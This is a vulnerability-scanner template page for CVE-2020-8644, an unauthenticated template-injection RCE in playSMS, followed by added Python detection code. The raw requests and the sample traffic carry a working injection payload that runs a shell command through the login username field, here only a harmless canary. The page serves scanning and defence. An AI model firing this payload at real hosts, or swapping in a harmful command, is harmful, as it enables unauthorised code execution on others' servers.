playSMS <1.4.3 - Remote Code Execution
ID: CVE-2020-8644
Severity: critical
Author: dbrwsky
Tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce
Description
PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.
YAML Source
id: CVE-2020-8644

info:
  name: playSMS <1.4.3 - Remote Code Execution
  author: dbrwsky
  severity: critical
  description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability.
  reference:
    - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
    - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8644
    - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html
    - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-8644
    cwe-id: CWE-94
    epss-score: 0.95356
    epss-percentile: 0.99358
    cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: playsms
    product: playsms
  tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce

http:
  - raw:
      - |
        GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

      - |
        POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '4468-0202-EVC'

      - type: status
        status:
          - 200

    extractors:
      - type: xpath
        name: csrf
        internal: true
        xpath:
          - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input
        attribute: value
        part: body
# digest: 4b0a00483046022100e43bd2b4ca492733cadef25592ed8bc0d0c48082abe0aeea80457f679b2534a302210098c18867926af3c61e4de801e8f69f683e379fd776f23aac58e1c9dbd33bddd7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-8644.yaml"
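The template above probes the playSMS login route with template delimiters in the username field and confirms execution by looking for the canary string reversed ('CVE-2020-8644' piped through rev becomes '4468-0202-EVC'). On the defending side, the same shape can be turned into a request-level detection rule for a reverse proxy or WAF log pipeline: flag POSTs to the core_auth login route whose form fields still contain {{ ... }} after URL-decoding. The following is an added example, not code from the Nuclei project or from playSMS; the request dictionary format and the sample requests are constructed for this example, and the double-decode step is an assumption about how double-encoded input should be normalised rather than anything the template states.

```python
"""Detection of server-side template injection attempts against the playSMS
login endpoint (CVE-2020-8644). Added example; the request format and sample
requests below are constructed, not taken from the template or playSMS."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Query parameters of the login route used by the template's second request.
# The POSTed username is the field the vulnerable version rendered as a template.
LOGIN_QUERY = {"app": "main", "inc": "core_auth", "route": "login", "op": "login"}

# A complete {{ ... }} pair after decoding is the indicator; an unbalanced
# brace pair on its own is not treated as a finding.
TEMPLATE_MARKER = re.compile(r"\{\{.*?\}\}", re.DOTALL)

# Canary used by the template's matcher: the command output of `rev` on the
# CVE id. Shown here only to explain why the matcher looks for '4468-0202-EVC'.
CANARY = "CVE-2020-8644"


def expected_canary_output(canary=CANARY):
    """Reverse the canary the way `rev` would, so a response can be checked."""
    return canary[::-1]


def _is_login_post(method, path):
    """True when the request is a POST to index.php with the login route params."""
    if method.upper() != "POST":
        return False
    parts = urlsplit(path)
    if not parts.path.endswith("/index.php"):
        return False
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return all(query.get(k) == v for k, v in LOGIN_QUERY.items())


def _decode_fully(value, rounds=2):
    """Apply URL-decoding up to `rounds` times so %257B%257B also surfaces {{."""
    current = value
    for _ in range(rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def classify_request(req):
    """Return a finding dict for a suspicious login POST, else None.

    req is a constructed dict: {"method": str, "path": str, "body": str}.
    """
    if not _is_login_post(req["method"], req["path"]):
        return None
    # parse_qs already decodes once; _decode_fully handles a second layer.
    fields = parse_qs(req.get("body", ""), keep_blank_values=True)
    for name, values in fields.items():
        for raw in values:
            decoded = _decode_fully(raw)
            if TEMPLATE_MARKER.search(decoded):
                return {"field": name, "value": decoded,
                        "rule": "template-delimiters-in-login-field"}
    return None


def scan(requests):
    """Return (index, finding) pairs for every request that trips the rule."""
    findings = []
    for index, req in enumerate(requests):
        finding = classify_request(req)
        if finding is not None:
            findings.append((index, finding))
    return findings


LOGIN_PATH = "/index.php?app=main&inc=core_auth&route=login&op=login"

# Constructed sample traffic: a normal GET, a benign login, the template's own
# probe body, a double-encoded variant, and an unbalanced brace pair.
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/index.php?app=main&inc=core_auth&route=login", "body": ""},
    {"method": "POST", "path": LOGIN_PATH,
     "body": "X-CSRF-Token=abc&username=alice&password=s3cret"},
    {"method": "POST", "path": LOGIN_PATH,
     "body": "X-CSRF-Token=abc&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password="},
    {"method": "POST", "path": LOGIN_PATH,
     "body": "X-CSRF-Token=abc&username=%257B%257Bx%257D%257D&password="},
    {"method": "POST", "path": LOGIN_PATH,
     "body": "X-CSRF-Token=abc&username=%7B%7Bbob&password="},
]

if __name__ == "__main__":
    for index, finding in scan(SAMPLE_REQUESTS):
        print(index, finding)
```

Running the block reports the third and fourth sample requests (indexes 2 and 3) as findings on the username field; the benign login and the unbalanced brace pair are left alone. The same check can be applied server-side as input validation on the login form, which is the practical mitigation short of upgrading to 1.4.3 or later as the template's remediation note recommends.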